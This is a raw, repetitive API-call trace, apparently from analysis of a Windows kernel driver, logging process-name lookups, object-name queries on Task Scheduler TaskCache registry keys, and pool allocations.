| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x110, ret_val_ptr_out = 0xffffe0003a7664d0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10e, ret_val_ptr_out = 0xffffe0003a769010 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x10e, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x110, ret_val_ptr_out = 0xffffe0003a7664d0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10e, ret_val_ptr_out = 0xffffe0003a769010 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x10e, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x110, ret_val_ptr_out = 0xffffe0003a7664d0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10e, ret_val_ptr_out = 0xffffe0003a769010 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x10e, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x110, ret_val_ptr_out = 0xffffe0003a7664d0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10e, ret_val_ptr_out = 0xffffe0003a769010 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x10e, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x110, ret_val_ptr_out = 0xffffe0003a7664d0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10e, ret_val_ptr_out = 0xffffe0003a769010 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x10e, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x110, ret_val_ptr_out = 0xffffe0003a7664d0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10e, ret_val_ptr_out = 0xffffe0003a769010 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x10e, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x110, ret_val_ptr_out = 0xffffe0003a7664d0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10e, ret_val_ptr_out = 0xffffe0003a769010 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x10e, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x110, ret_val_ptr_out = 0xffffe0003a7664d0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10e, ret_val_ptr_out = 0xffffe0003a769010 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x10e, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x110, ret_val_ptr_out = 0xffffe0003a7664d0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10e, ret_val_ptr_out = 0xffffe0003a769010 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x10e, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x110, ret_val_ptr_out = 0xffffe0003a7664d0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10e, ret_val_ptr_out = 0xffffe0003a769010 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x10e, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xc0, ret_val_ptr_out = 0xffffe0003a76e520 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xbe, ret_val_ptr_out = 0xffffe0003a782cc0 |
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0xbe, ObjectNameInfo_unk_out = 0xffffe0003a782cc0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782cc0, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76e520, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xc0, ret_val_ptr_out = 0xffffe0003a76e520 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xbe, ret_val_ptr_out = 0xffffe0003a782cc0 |
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0xbe, ObjectNameInfo_unk_out = 0xffffe0003a782cc0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782cc0, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76e520, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
